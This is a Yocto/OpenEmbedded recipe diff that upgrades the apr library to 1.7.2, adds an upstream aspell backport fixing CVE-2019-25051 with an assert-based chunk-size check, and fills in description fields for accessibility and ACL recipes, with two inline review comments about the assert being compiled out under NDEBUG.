diff --git a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
index 72e706f966..d63423f3a1 100644
--- a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
+++ b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
@@ -1,8 +1,7 @@
1From 5925b20da8bbc34d9bf5a5dca123ef38864d43c6 Mon Sep 17 00:00:00 2001 1From 689a8db96a6d1e1cae9cbfb35d05ac82140a6555 Mon Sep 17 00:00:00 2001
2From: Hongxu Jia <hongxu.jia@windriver.com> 2From: Hongxu Jia <hongxu.jia@windriver.com>
3Date: Tue, 30 Jan 2018 09:39:06 +0800 3Date: Tue, 30 Jan 2018 09:39:06 +0800
4Subject: [PATCH 2/7] apr: Remove workdir path references from installed apr 4Subject: [PATCH] apr: Remove workdir path references from installed apr files
5 files
6 5
7Upstream-Status: Inappropriate [configuration] 6Upstream-Status: Inappropriate [configuration]
8 7
@@ -14,20 +13,23 @@ packages at target run time, the workdir path caused confusion.
14Rebase to 1.6.3 13Rebase to 1.6.3
15 14
16Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> 15Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
16
17--- 17---
18 apr-config.in | 26 ++------------------------ 18 apr-config.in | 32 ++------------------------------
19 1 file changed, 2 insertions(+), 24 deletions(-) 19 1 file changed, 2 insertions(+), 30 deletions(-)
20 20
21diff --git a/apr-config.in b/apr-config.in 21diff --git a/apr-config.in b/apr-config.in
22index 84b4073..bbbf651 100644 22index bed47ca..47874e5 100644
23--- a/apr-config.in 23--- a/apr-config.in
24+++ b/apr-config.in 24+++ b/apr-config.in
25@@ -152,14 +152,7 @@ while test $# -gt 0; do 25@@ -164,16 +164,7 @@ while test $# -gt 0; do
26 flags="$flags $LDFLAGS" 26 flags="$flags $LDFLAGS"
27 ;; 27 ;;
28 --includes) 28 --includes)
29- if test "$location" = "installed"; then 29- if test "$location" = "installed"; then
30 flags="$flags -I$includedir $EXTRA_INCLUDES" 30 flags="$flags -I$includedir $EXTRA_INCLUDES"
31- elif test "$location" = "crosscompile"; then
32- flags="$flags -I$APR_TARGET_DIR/$includedir $EXTRA_INCLUDES"
31- elif test "$location" = "source"; then 33- elif test "$location" = "source"; then
32- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES" 34- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES"
33- else 35- else
@@ -37,13 +39,15 @@ index 84b4073..bbbf651 100644
37 ;; 39 ;;
38 --srcdir) 40 --srcdir)
39 echo $APR_SOURCE_DIR 41 echo $APR_SOURCE_DIR
40@@ -181,29 +174,14 @@ while test $# -gt 0; do 42@@ -197,33 +188,14 @@ while test $# -gt 0; do
41 exit 0 43 exit 0
42 ;; 44 ;;
43 --link-ld) 45 --link-ld)
44- if test "$location" = "installed"; then 46- if test "$location" = "installed"; then
45- ### avoid using -L if libdir is a "standard" location like /usr/lib 47- ### avoid using -L if libdir is a "standard" location like /usr/lib
46- flags="$flags -L$libdir -l${APR_LIBNAME}" 48- flags="$flags -L$libdir -l${APR_LIBNAME}"
49- elif test "$location" = "crosscompile"; then
50- flags="$flags -L$APR_TARGET_DIR/$libdir -l${APR_LIBNAME}"
47- else 51- else
48- ### this surely can't work since the library is in .libs? 52- ### this surely can't work since the library is in .libs?
49- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}" 53- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}"
@@ -62,6 +66,8 @@ index 84b4073..bbbf651 100644
62- # Since the user is specifying they are linking with libtool, we 66- # Since the user is specifying they are linking with libtool, we
63- # *know* that -R will be recognized by libtool. 67- # *know* that -R will be recognized by libtool.
64- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}" 68- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}"
69- elif test "$location" = "crosscompile"; then
70- flags="$flags -L${APR_TARGET_DIR}/$libdir -l${APR_LIBNAME}"
65- else 71- else
66- flags="$flags $LA_FILE" 72- flags="$flags $LA_FILE"
67- fi 73- fi
@@ -69,6 +75,3 @@ index 84b4073..bbbf651 100644
69 ;; 75 ;;
70 --shlib-path-var) 76 --shlib-path-var)
71 echo "$SHLIBPATH_VAR" 77 echo "$SHLIBPATH_VAR"
72--
731.8.3.1
74
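diff --git a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch b/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
deleted file mode 100644
index 4dd53bd8eb..0000000000
--- a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From d5028c10f156c224475b340cfb1ba025d6797243 Mon Sep 17 00:00:00 2001
-From: Hongxu Jia <hongxu.jia@windriver.com>
-Date: Fri, 2 Feb 2018 15:51:42 +0800
-Subject: [PATCH 3/7] Makefile.in/configure.in: support cross compiling
-
-While cross compiling, the tools/gen_test_char could not
-be executed at build time, use AX_PROG_CC_FOR_BUILD to
-build native tools/gen_test_char
-
-Upstream-Status: Submitted [https://github.com/apache/apr/pull/8]
-
-Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
----
- Makefile.in | 10 +++-------
- configure.in | 3 +++
- 2 files changed, 6 insertions(+), 7 deletions(-)
-
-diff --git a/Makefile.in b/Makefile.in
-index 5fb760e..8675f90 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -46,7 +46,7 @@ LT_VERSION = @LT_VERSION@
-
- CLEAN_TARGETS = apr-config.out apr.exp exports.c export_vars.c .make.dirs \
- build/apr_rules.out tools/gen_test_char@EXEEXT@ \
-- tools/gen_test_char.o tools/gen_test_char.lo \
-+ tools/gen_test_char.o \
- include/private/apr_escape_test_char.h
- DISTCLEAN_TARGETS = config.cache config.log config.status \
- include/apr.h include/arch/unix/apr_private.h \
-@@ -131,13 +131,9 @@ check: $(TARGET_LIB)
- etags:
- etags `find . -name '*.[ch]'`
-
--OBJECTS_gen_test_char = tools/gen_test_char.lo $(LOCAL_LIBS)
--tools/gen_test_char.lo: tools/gen_test_char.c
-+tools/gen_test_char@EXEEXT@: tools/gen_test_char.c
- $(APR_MKDIR) tools
-- $(LT_COMPILE)
--
--tools/gen_test_char@EXEEXT@: $(OBJECTS_gen_test_char)
-- $(LINK_PROG) $(OBJECTS_gen_test_char) $(ALL_LIBS)
-+ $(CC_FOR_BUILD) $(CFLAGS_FOR_BUILD) $< -o $@
-
- include/private/apr_escape_test_char.h: tools/gen_test_char@EXEEXT@
- $(APR_MKDIR) include/private
-diff --git a/configure.in b/configure.in
-index 719f331..361120f 100644
---- a/configure.in
-+++ b/configure.in
-@@ -183,6 +183,9 @@ dnl can only be used once within a configure script, so this prevents a
- dnl preload section from invoking the macro to get compiler info.
- AC_PROG_CC
-
-+dnl Check build CC for gen_test_char compiling which is executed at build time.
-+AX_PROG_CC_FOR_BUILD
-+
- dnl AC_PROG_SED is only avaliable in recent autoconf versions.
- dnl Use AC_CHECK_PROG instead if AC_PROG_SED is not present.
- ifdef([AC_PROG_SED],
---
-1.8.3.1
-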
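diff --git a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch b/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
deleted file mode 100644
index d1a2ebe881..0000000000
--- a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 49661ea3858cf8494926cccf57d3e8c6dcb47117 Mon Sep 17 00:00:00 2001
-From: Dengke Du <dengke.du@windriver.com>
-Date: Wed, 14 Dec 2016 18:13:08 +0800
-Subject: [PATCH] apr: fix off_t size doesn't match in glibc when cross
- compiling
-
-In configure.in, it contains the following:
-
- APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-
-the macro "APR_CHECK_SIZEOF_EXTENDED" was defined in build/apr_common.m4,
-it use the "AC_TRY_RUN" macro, this macro let the off_t to 8, when cross
-compiling enable.
-
-So it was hardcoded for cross compiling, we should detect it dynamic based on
-the sysroot's glibc. We change it to the following:
-
- AC_CHECK_SIZEOF(off_t)
-
-The same for the following hardcoded types for cross compiling:
-
- pid_t 8
- ssize_t 8
- size_t 8
- off_t 8
-
-Change the above correspondingly.
-
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
-
-Upstream-Status: Pending
-
----
- configure.in | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/configure.in b/configure.in
-index 27b8539..fb408d1 100644
---- a/configure.in
-+++ b/configure.in
-@@ -1801,7 +1801,7 @@ else
- socklen_t_value="int"
- fi
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], pid_t, 8)
-+AC_CHECK_SIZEOF(pid_t)
-
- if test "$ac_cv_sizeof_pid_t" = "$ac_cv_sizeof_short"; then
- pid_t_fmt='#define APR_PID_T_FMT "hd"'
-@@ -1873,7 +1873,7 @@ APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned long, lu, [size_t_fmt="lu"], [
- APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned int, u, [size_t_fmt="u"])
- ])
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], ssize_t, 8)
-+AC_CHECK_SIZEOF(ssize_t)
-
- dnl the else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_ssize_t])
-@@ -1891,7 +1891,7 @@ fi
-
- ssize_t_fmt="#define APR_SSIZE_T_FMT \"$ssize_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <stddef.h>], size_t, 8)
-+AC_CHECK_SIZEOF(size_t)
-
- # else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_size_t])
-@@ -1909,7 +1909,7 @@ fi
-
- size_t_fmt="#define APR_SIZE_T_FMT \"$size_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-+AC_CHECK_SIZEOF(off_t)
-
- if test "${ac_cv_sizeof_off_t}${apr_cv_use_lfs64}" = "4yes"; then
- # Enable LFS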
diff --git a/meta/recipes-support/apr/apr/libtoolize_check.patch b/meta/recipes-support/apr/apr/libtoolize_check.patch
index 740792e6b0..80ce43caa4 100644
--- a/meta/recipes-support/apr/apr/libtoolize_check.patch
+++ b/meta/recipes-support/apr/apr/libtoolize_check.patch
@@ -1,6 +1,7 @@
1From 17835709bc55657b7af1f7c99b3f572b819cf97e Mon Sep 17 00:00:00 2001
1From: Helmut Grohne <helmut@subdivi.de> 2From: Helmut Grohne <helmut@subdivi.de>
2Subject: check for libtoolize rather than libtool 3Date: Tue, 7 Feb 2023 07:04:00 +0000
3Last-Update: 2014-09-19 4Subject: [PATCH] check for libtoolize rather than libtool
4 5
5libtool is now in package libtool-bin, but apr only needs libtoolize. 6libtool is now in package libtool-bin, but apr only needs libtoolize.
6 7
@@ -8,14 +9,22 @@ Upstream-Status: Pending [ from debian: https://sources.debian.org/data/main/a/a
8 9
9Signed-off-by: Robert Yang <liezhi.yang@windriver.com> 10Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
10 11
11--- apr.orig/build/buildcheck.sh 12---
12+++ apr/build/buildcheck.sh 13 build/buildcheck.sh | 10 ++++------
13@@ -39,11 +39,11 @@ fi 14 1 file changed, 4 insertions(+), 6 deletions(-)
15
16diff --git a/build/buildcheck.sh b/build/buildcheck.sh
17index 44921b5..08bc8a8 100755
18--- a/build/buildcheck.sh
19+++ b/build/buildcheck.sh
20@@ -39,13 +39,11 @@ fi
14 # ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a 21 # ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a
15 # output is multiline from 1.5 onwards 22 # output is multiline from 1.5 onwards
16 23
17-# Require libtool 1.4 or newer 24-# Require libtool 1.4 or newer
18-libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14` 25-if test -z "$libtool"; then
26- libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
27-fi
19-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'` 28-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'`
20+# Require libtoolize 1.4 or newer 29+# Require libtoolize 1.4 or newer
21+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14` 30+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14`
diff --git a/meta/recipes-support/apr/apr_1.7.0.bb b/meta/recipes-support/apr/apr_1.7.2.bb
index c9b9bf0f50..807dce21da 100644
--- a/meta/recipes-support/apr/apr_1.7.0.bb
+++ b/meta/recipes-support/apr/apr_1.7.2.bb
@@ -1,8 +1,8 @@
1SUMMARY = "Apache Portable Runtime (APR) library" 1SUMMARY = "Apache Portable Runtime (APR) library"
2DESCRIPTION = "The Apache Portable Runtime (APR) is a supporting library for the \ 2
3Apache web server. It provides a set of APIs that map to the underlying \ 3DESCRIPTION = "Create and maintain software libraries that provide a predictable \
4operating system (OS). Where the OS does not support a particular function, \ 4and consistent interface to underlying platform-specific implementations."
5APR will provide an emulation." 5
6HOMEPAGE = "http://apr.apache.org/" 6HOMEPAGE = "http://apr.apache.org/"
7SECTION = "libs" 7SECTION = "libs"
8DEPENDS = "util-linux" 8DEPENDS = "util-linux"
@@ -16,17 +16,15 @@ BBCLASSEXTEND = "native nativesdk"
16SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \ 16SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \
17 file://run-ptest \ 17 file://run-ptest \
18 file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \ 18 file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \
19 file://0003-Makefile.in-configure.in-support-cross-compiling.patch \
20 file://0004-Fix-packet-discards-HTTP-redirect.patch \ 19 file://0004-Fix-packet-discards-HTTP-redirect.patch \
21 file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \ 20 file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \
22 file://0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch \
23 file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \ 21 file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \
24 file://libtoolize_check.patch \ 22 file://libtoolize_check.patch \
25 file://0001-Add-option-to-disable-timed-dependant-tests.patch \ 23 file://0001-Add-option-to-disable-timed-dependant-tests.patch \
24 file://0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch \
26 " 25 "
27 26
28SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7" 27SRC_URI[sha256sum] = "75e77cc86776c030c0a5c408dfbd0bf2a0b75eed5351e52d5439fa1e5509a43e"
29SRC_URI[sha256sum] = "e2e148f0b2e99b8e5c6caa09f6d4fb4dd3e83f744aa72a952f94f5a14436f7ea"
30 28
31inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script 29inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script
32 30
@@ -34,17 +32,30 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
34 32
35# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928 33# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928
36CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes" 34CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes"
37 35# Enable largefile
36CACHED_CONFIGUREVARS += "apr_cv_use_lfs64=yes"
37# Additional AC_TRY_RUN tests which will need to be cached for cross compile
38CACHED_CONFIGUREVARS += "apr_cv_epoll=yes epoll_create1=yes apr_cv_sock_cloexec=yes \
39 ac_cv_struct_rlimit=yes \
40 ac_cv_func_sem_open=yes \
41 apr_cv_process_shared_works=yes \
42 apr_cv_mutex_robust_shared=yes \
43 "
38# Also suppress trying to use sctp. 44# Also suppress trying to use sctp.
39# 45#
40CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no" 46CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no"
41 47
42CACHED_CONFIGUREVARS += "ac_cv_sizeof_struct_iovec=yes" 48# ac_cv_sizeof_struct_iovec is deduced using runtime check which will fail during cross-compile
49CACHED_CONFIGUREVARS += "${@['ac_cv_sizeof_struct_iovec=16','ac_cv_sizeof_struct_iovec=8'][d.getVar('SITEINFO_BITS') != '32']}"
50
43CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes" 51CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes"
44 52
53CACHED_CONFIGUREVARS:append:libc-musl = " ac_cv_strerror_r_rc_int=yes"
45PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}" 54PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
55PACKAGECONFIG:append:libc-musl = " xsi-strerror"
46PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," 56PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
47PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests," 57PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests,"
58PACKAGECONFIG[xsi-strerror] = "ac_cv_strerror_r_rc_int=yes,ac_cv_strerror_r_rc_int=no,"
48 59
49do_configure_prepend() { 60do_configure_prepend() {
50 # Avoid absolute paths for grep since it causes failures 61 # Avoid absolute paths for grep since it causes failures
diff --git a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
index 21bbcab3d3..d1db562bb5 100644
--- a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
+++ b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
@@ -2,6 +2,7 @@
2# Released under the MIT license (see COPYING.MIT for the terms) 2# Released under the MIT license (see COPYING.MIT for the terms)
3 3
4SUMMARY = "Glibc hierarchical argument parsing standalone library" 4SUMMARY = "Glibc hierarchical argument parsing standalone library"
5DESCRIPTION = "Standalone version of arguments parsing functions from GLIBC"
5HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/" 6HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/"
6LICENSE = "LGPL-2.1" 7LICENSE = "LGPL-2.1"
7LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a" 8LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a"
diff --git a/meta/recipes-support/aspell/aspell_0.60.8.bb b/meta/recipes-support/aspell/aspell_0.60.8.bb
index f1d931b39c..9147c820e7 100644
--- a/meta/recipes-support/aspell/aspell_0.60.8.bb
+++ b/meta/recipes-support/aspell/aspell_0.60.8.bb
@@ -1,14 +1,21 @@
1SUMMARY = "GNU Aspell spell-checker" 1SUMMARY = "GNU Aspell spell-checker"
2DESCRIPTION = "GNU Aspell is a spell-checker which can be used either as a \ 2
3standalone application or embedded in other programs. Its main feature is that \ 3DESCRIPTION = "Spell checker designed to eventually replace Ispell. \
4it does a much better job of suggesting possible spellings than just about any \ 4It can either be used as a library or as an independent spell checker. \
5other spell-checker available for the English language" 5Its main feature is that it does a superior job of suggesting possible \
6replacements for a misspelled word than just about any other spell \
7checker out there for the English language."
8
6SECTION = "console/utils" 9SECTION = "console/utils"
7 10
11HOMEPAGE = "http://aspell.net/"
12
8LICENSE = "LGPLv2 | LGPLv2.1" 13LICENSE = "LGPLv2 | LGPLv2.1"
9LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34" 14LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
10 15
11SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz" 16SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz \
17 file://CVE-2019-25051.patch \
18"
12SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3" 19SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3"
13SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2" 20SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2"
14 21
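Review bot: The CVE-2019-25051 fix wired in through `file://CVE-2019-25051.patch` enforces the chunk-size bound with `assert(!will_overflow(sz))` in `check_size`, as the patch body on this page shows, so the overflow check disappears entirely if aspell is compiled with `NDEBUG` defined. Nothing in the recipe lines shown here records that dependency. I would add next to the SRC_URI entry a comment such as `# CVE-2019-25051.patch relies on assert(); do not build with -DNDEBUG`, and confirm that no distro or optimisation configuration adds that define. Whether any such configuration exists is not visible from this hunk.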
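diff --git a/meta/recipes-support/aspell/files/CVE-2019-25051.patch b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
new file mode 100644
index 0000000000..8513f6de79
--- /dev/null
+++ b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
@@ -0,0 +1,101 @@
+From 0718b375425aad8e54e1150313b862e4c6fd324a Mon Sep 17 00:00:00 2001
+From: Kevin Atkinson <kevina@gnu.org>
+Date: Sat, 21 Dec 2019 20:32:47 +0000
+Subject: [PATCH] objstack: assert that the alloc size will fit within a chunk
+ to prevent a buffer overflow
+
+Bug found using OSS-Fuze.
+
+Upstream-Status: Backport
+[https://github.com/gnuaspell/aspell/commit/0718b375425aad8e54e1150313b862e4c6fd324a]
+CVE: CVE-2019-25051
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ common/objstack.hpp | 18 ++++++++++++++----
+ 1 file changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/common/objstack.hpp b/common/objstack.hpp
+index 3997bf7..bd97ccd 100644
+--- a/common/objstack.hpp
++++ b/common/objstack.hpp
+@@ -5,6 +5,7 @@
+ #include "parm_string.hpp"
+ #include <stdlib.h>
+ #include <assert.h>
++#include <stddef.h>
+
+ namespace acommon {
+
+@@ -26,6 +27,12 @@ class ObjStack
+ byte * temp_end;
+ void setup_chunk();
+ void new_chunk();
++ bool will_overflow(size_t sz) const {
++ return offsetof(Node,data) + sz > chunk_size;
++ }
++ void check_size(size_t sz) {
++ assert(!will_overflow(sz));
++ }
+
+ ObjStack(const ObjStack &);
+ void operator=(const ObjStack &);
+@@ -56,7 +63,7 @@ class ObjStack
+ void * alloc_bottom(size_t size) {
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); tmp = bottom; bottom += size;}
++ if (bottom > top) {check_size(size); new_chunk(); tmp = bottom; bottom += size;}
+ return tmp;
+ }
+ // This alloc_bottom will insure that the object is aligned based on the
+@@ -66,7 +73,7 @@ class ObjStack
+ align_bottom(align);
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); goto loop;}
++ if (bottom > top) {check_size(size); new_chunk(); goto loop;}
+ return tmp;
+ }
+ char * dup_bottom(ParmString str) {
+@@ -79,7 +86,7 @@ class ObjStack
+ // always be aligned as such.
+ void * alloc_top(size_t size) {
+ top -= size;
+- if (top < bottom) {new_chunk(); top -= size;}
++ if (top < bottom) {check_size(size); new_chunk(); top -= size;}
+ return top;
+ }
+ // This alloc_top will insure that the object is aligned based on
+@@ -88,7 +95,7 @@ class ObjStack
+ {loop:
+ top -= size;
+ align_top(align);
+- if (top < bottom) {new_chunk(); goto loop;}
++ if (top < bottom) {check_size(size); new_chunk(); goto loop;}
+ return top;
+ }
+ char * dup_top(ParmString str) {
+@@ -117,6 +124,7 @@ class ObjStack
+ void * alloc_temp(size_t size) {
+ temp_end = bottom + size;
+ if (temp_end > top) {
++ check_size(size);
+ new_chunk();
+ temp_end = bottom + size;
+ }
+@@ -131,6 +139,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
+@@ -150,6 +159,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;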
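Review bot: `check_size()` enforces the new bound only through `assert(!will_overflow(sz))`, so a build that defines `NDEBUG` compiles the guard away and an oversized request still reaches `new_chunk()` and the pointer arithmetic after it. Whether this recipe's build sets `NDEBUG` is not visible on this page; if it can, an unconditional failure such as `if (will_overflow(sz)) abort();` keeps the protection in release builds. Separately, `offsetof(Node,data) + sz > chunk_size` can wrap for a very large `sz`; `sz > chunk_size - offsetof(Node,data)` avoids that, assuming `chunk_size` is never smaller than the header offset. Since this is a verbatim upstream backport, either change would be a local deviation and is better raised upstream as well.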
diff --git a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
index c297912588..ad30617e56 100644
--- a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
+++ b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
@@ -1,5 +1,7 @@
1SUMMARY = "AT-SPI 2 Toolkit Bridge" 1SUMMARY = "AT-SPI 2 Toolkit Bridge"
2DESCRIPTION = "Contains a library that bridges ATK to At-Spi2 D-Bus service. Toolkit widgets use it to provide their content to screen readers such as Orca."
2HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus" 3HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
4BUGTRACKER = "http://bugzilla.gnome.org/"
3LICENSE = "LGPL-2.1+" 5LICENSE = "LGPL-2.1+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
5 7
diff --git a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
index bcef8ef169..2ad09878b7 100644
--- a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
+++ b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
@@ -1,7 +1,9 @@
1SUMMARY = "Assistive Technology Service Provider Interface (dbus core)" 1SUMMARY = "Assistive Technology Service Provider Interface (dbus core)"
2DESCRIPTION = "At-Spi2 is a protocol over DBus, toolkit widgets use it to \ 2
3provide their content to screen readers such as Orca." 3DESCRIPTION = "It provides a Service Provider Interface for the Assistive Technologies available on the GNOME platform and a library against which applications can be linked."
4
4HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus" 5HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
6BUGTRACKER = "http://bugzilla.gnome.org/"
5LICENSE = "LGPL-2.1+" 7LICENSE = "LGPL-2.1+"
6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 8LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
7 9
diff --git a/meta/recipes-support/atk/atk_2.34.1.bb b/meta/recipes-support/atk/atk_2.34.1.bb
index 741350ffe5..25ef3c6c52 100644
--- a/meta/recipes-support/atk/atk_2.34.1.bb
+++ b/meta/recipes-support/atk/atk_2.34.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Accessibility toolkit for GNOME" 1SUMMARY = "Accessibility toolkit for GNOME"
2DESCRIPTION = "Provides application programming interfaces (APIs) for implementing accessibility support in software."
2HOMEPAGE = "https://wiki.gnome.org/Accessibility" 3HOMEPAGE = "https://wiki.gnome.org/Accessibility"
3BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues" 4BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues"
4SECTION = "x11/libs" 5SECTION = "x11/libs"
diff --git a/meta/recipes-support/attr/acl_2.2.53.bb b/meta/recipes-support/attr/acl_2.2.53.bb
index b120c1f16f..7cee45948d 100644
--- a/meta/recipes-support/attr/acl_2.2.53.bb
+++ b/meta/recipes-support/attr/acl_2.2.53.bb
@@ -1,7 +1,10 @@
1SUMMARY = "Utilities for managing POSIX Access Control Lists" 1SUMMARY = "Utilities for managing POSIX Access Control Lists"
2HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
3DESCRIPTION = "ACL allows you to provide different levels of access to files \ 2DESCRIPTION = "ACL allows you to provide different levels of access to files \
4and folders for different users." 3and folders for different users."
4
5HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
6BUGTRACKER = "http://savannah.nongnu.org/bugs/?group=acl"
7
5SECTION = "libs" 8SECTION = "libs"
6 9
7LICENSE = "LGPLv2.1+ & GPLv2+" 10LICENSE = "LGPLv2.1+ & GPLv2+"
diff --git a/meta/recipes-support/attr/attr.inc b/meta/recipes-support/attr/attr.inc
index 8515f96bf7..30ba0b4445 100644
--- a/meta/recipes-support/attr/attr.inc
